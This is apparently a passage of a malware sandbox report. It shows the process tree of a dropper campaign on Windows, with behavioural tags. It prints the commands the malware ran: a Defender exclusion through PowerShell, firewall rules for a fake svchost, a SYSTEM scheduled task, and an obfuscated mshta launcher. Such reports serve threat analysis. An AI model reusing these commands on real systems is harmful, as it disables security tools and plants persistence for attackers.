                                                                                                                                                                                                                                      taskkill /im Az3l8L83hrEtbewwc18G8QPn.exe /f
                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                      PID:6792
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                      timeout /t 6
                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                      PID:6156
                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\mSsr7ycgixu1Cx0pHEnQPuES.exe
                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\mSsr7ycgixu1Cx0pHEnQPuES.exe"
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                PID:2616
                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\1wIwVtxqgf4BjRoyjQSI4rAD.exe
                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\1wIwVtxqgf4BjRoyjQSI4rAD.exe"
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                PID:3896
                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\jC4i5VtxK_tp8hlXAMjfDi0y.exe
                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\jC4i5VtxK_tp8hlXAMjfDi0y.exe"
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                PID:4992
                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\jC4i5VtxK_tp8hlXAMjfDi0y.exe
                                                                                                                                                                                                                                  "jC4i5VtxK_tp8hlXAMjfDi0y.exe"
                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:5212
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5212 -s 144
                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                    PID:5340
                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\s7iUKGsY7GH7PAivyXsH2dGa.exe
                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\s7iUKGsY7GH7PAivyXsH2dGa.exe"
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                PID:2236
                                                                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                    PID:6028
                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\sJmUejaOSU1D0TUwDrOldGwu.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\sJmUejaOSU1D0TUwDrOldGwu.exe"
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:4848
                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\9wMTeCoJM6SlPfmIzCwaGl1a.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\9wMTeCoJM6SlPfmIzCwaGl1a.exe"
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Modifies system executable filetype association
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                  PID:5284
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3582-490\9wMTeCoJM6SlPfmIzCwaGl1a.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\3582-490\9wMTeCoJM6SlPfmIzCwaGl1a.exe"
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    PID:5608
                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\RxixhVXRQf8vOd9jb8TiECqT.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\RxixhVXRQf8vOd9jb8TiECqT.exe"
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                  PID:5628
                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\_Ey_T_kgl0M9uQvD4GWOEpGa.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\_Ey_T_kgl0M9uQvD4GWOEpGa.exe"
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:5736
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 660
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    PID:5808
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 672
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    PID:6000
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 704
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    PID:4416
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 816
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    PID:5572
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 892
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    PID:1692
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 1152
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    PID:6700
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 1176
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    PID:6744
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 1264
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    PID:6148
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 1240
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    PID:6444
                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\Kw5C5095y5hfO7mCqfKRMqtR.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\Kw5C5095y5hfO7mCqfKRMqtR.exe"
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                  PID:5956
                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\16ShvS6IfQZRrUbWtbl8xMrv.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\16ShvS6IfQZRrUbWtbl8xMrv.exe"
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                  PID:5232
                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\EHcL5WzVIkAyzchpF2VBe86M.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\EHcL5WzVIkAyzchpF2VBe86M.exe"
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                  PID:5300
                                                                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                      PID:4920
                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\pIZkY6zb_VGbNnNLkwvl7UIO.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\pIZkY6zb_VGbNnNLkwvl7UIO.exe"
                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    PID:5852
                                                                                                                                                                                                                                    • C:\Windows\svchost.com
                                                                                                                                                                                                                                      "C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                        PID:5652
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
                                                                                                                                                                                                                                          C:\Windows\System32\WINDOW~1\v1.0\powershell.exe Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                            PID:6300
                                                                                                                                                                                                                                        • C:\Windows\svchost.com
                                                                                                                                                                                                                                          "C:\Windows\svchost.com" "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                            PID:4980
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                              C:\Windows\System32\netsh.exe advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                PID:1868
                                                                                                                                                                                                                                            • C:\Windows\svchost.com
                                                                                                                                                                                                                                              "C:\Windows\svchost.com" "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                PID:5052
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                  C:\Windows\System32\netsh.exe advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                    PID:2596
                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                                                                                  schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                  PID:7148
                                                                                                                                                                                                                                                • C:\Windows\svchost.com
                                                                                                                                                                                                                                                  "C:\Windows\svchost.com" "C:\Windows\System\svchost.exe" formal
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                    PID:5428
                                                                                                                                                                                                                                                    • C:\Windows\System\svchost.exe
                                                                                                                                                                                                                                                      C:\Windows\System\svchost.exe formal
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                        PID:4112
                                                                                                                                                                                                                                                        • C:\Windows\svchost.com
                                                                                                                                                                                                                                                          "C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                            PID:6180
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
                                                                                                                                                                                                                                                              C:\Windows\System32\WINDOW~1\v1.0\powershell.exe Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                PID:4940
                                                                                                                                                                                                                                                            • C:\Windows\svchost.com
                                                                                                                                                                                                                                                              "C:\Windows\svchost.com" "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                PID:5364
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                  C:\Windows\System32\netsh.exe advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                    PID:4308
                                                                                                                                                                                                                                                                • C:\Windows\svchost.com
                                                                                                                                                                                                                                                                  "C:\Windows\svchost.com" "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                    PID:6528
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                      C:\Windows\System32\netsh.exe advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                        PID:5364
                                                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\Ni9GH9Y7886F695TVXOQX6Jv.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\Ni9GH9Y7886F695TVXOQX6Jv.exe"
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                PID:6092
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\8858515.scr
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\8858515.scr" /S
                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                    PID:7116
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\7805015.scr
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\7805015.scr" /S
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                      PID:1816
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\6654989.scr
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\6654989.scr" /S
                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                        PID:4988
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\8914735.scr
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\8914735.scr" /S
                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                          PID:5648
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\2258439.scr
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\2258439.scr" /S
                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                            PID:7104
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\FXMROXxAsUVOvNdheLzUjzPr.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\FXMROXxAsUVOvNdheLzUjzPr.exe"
                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          PID:5252
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\dENs41pMwJFb4skoHe0GiKZN.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\dENs41pMwJFb4skoHe0GiKZN.exe"
                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          PID:1340
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                              PID:4968
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                PID:4420
                                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\WVu9jSzmmrX7k_eRFCiA0CC6.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\WVu9jSzmmrX7k_eRFCiA0CC6.exe"
                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                            PID:4052
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                PID:6164
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--oYd2f1"
                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                    PID:8004
                                                                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\Mlz6TgqXjP5oS8KoVDbRQmZc.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\Mlz6TgqXjP5oS8KoVDbRQmZc.exe"
                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                  PID:5600
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\Mlz6TgqXjP5oS8KoVDbRQmZc.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\Mlz6TgqXjP5oS8KoVDbRQmZc.exe"
                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                    PID:3816
                                                                                                                                                                                                                                                                                • C:\Windows\svchost.com
                                                                                                                                                                                                                                                                                  "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\ADOBEF~1\DXDDRX~1.EXE"
                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                  PID:3012
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\ADOBEF~1\DXDDRX~1.EXE
                                                                                                                                                                                                                                                                                    C:\Users\Admin\Pictures\ADOBEF~1\DXDDRX~1.EXE
                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                    PID:3512
                                                                                                                                                                                                                                                                                    • C:\Windows\svchost.com
                                                                                                                                                                                                                                                                                      "C:\Windows\svchost.com" "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\ADOBEF~1\DXDDRX~1.EXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\ADOBEF~1\DXDDRX~1.EXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                        PID:7148
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                          C:\Windows\System32\mshta.exe VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( CMd /r CopY /y ""C:\Users\Admin\Pictures\ADOBEF~1\DXDDRX~1.EXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\ADOBEF~1\DXDDRX~1.EXE"" ) do taskkill -im ""%~NxK"" -F ,0, trUE ) )
                                                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                                                            PID:7160
                                                                                                                                                                                                                                                                                    • C:\Windows\svchost.com
                                                                                                                                                                                                                                                                                      "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\ADOBEF~1\S6FTJ8~1.EXE"
                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                      PID:3820
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\ADOBEF~1\S6FTJ8~1.EXE
                                                                                                                                                                                                                                                                                        C:\Users\Admin\Pictures\ADOBEF~1\S6FTJ8~1.EXE
                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                        PID:1500
                                                                                                                                                                                                                                                                                    • C:\Windows\svchost.com
                                                                                                                                                                                                                                                                                      "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\ADOBEF~1\FUCMP0~1.EXE"
                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                      PID:5524
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\ADOBEF~1\FUCMP0~1.EXE
                                                                                                                                                                                                                                                                                        C:\Users\Admin\Pictures\ADOBEF~1\FUCMP0~1.EXE
                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                        PID:5884
                                                                                                                                                                                                                                                                                        • C:\Windows\svchost.com
                                                                                                                                                                                                                                                                                          "C:\Windows\svchost.com" "C:\PROGRA~2\Company\NEWPRO~1\cutm3.exe"
                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                            PID:4568
                                                                                                                                                                                                                                                                                            • C:\PROGRA~2\Company\NEWPRO~1\cutm3.exe
                                                                                                                                                                                                                                                                                              C:\PROGRA~2\Company\NEWPRO~1\cutm3.exe
                                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                                PID:1744
                                                                                                                                                                                                                                                                                            • C:\Windows\svchost.com
                                                                                                                                                                                                                                                                                              "C:\Windows\svchost.com" "C:\PROGRA~2\Company\NEWPRO~1\DOWNFL~1.EXE"
                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                PID:6480
                                                                                                                                                                                                                                                                                                • C:\PROGRA~2\Company\NEWPRO~1\DOWNFL~1.EXE
                                                                                                                                                                                                                                                                                                  C:\PROGRA~2\Company\NEWPRO~1\DOWNFL~1.EXE
                                                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                                                    PID:4208
                                                                                                                                                                                                                                                                                                • C:\Windows\svchost.com
                                                                                                                                                                                                                                                                                                  "C:\Windows\svchost.com" "C:\PROGRA~2\Company\NEWPRO~1\inst3.exe"
                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                  PID:4388
                                                                                                                                                                                                                                                                                                  • C:\PROGRA~2\Company\NEWPRO~1\inst3.exe
                                                                                                                                                                                                                                                                                                    C:\PROGRA~2\Company\NEWPRO~1\inst3.exe
                                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                                      PID:6696
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Mon20b6f9d5bd03a305.exe
                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                            PID:2712
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon20b6f9d5bd03a305.exe
                                                                                                                                                                                                                                                                                              Mon20b6f9d5bd03a305.exe
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                              PID:3664
                                                                                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                      PID:3996
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                        PID:3868
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                      PID:2188
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:1624
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\9806.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\9806.exe
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:4568
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\FFF8.exe
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\FFF8.exe
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:4800
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
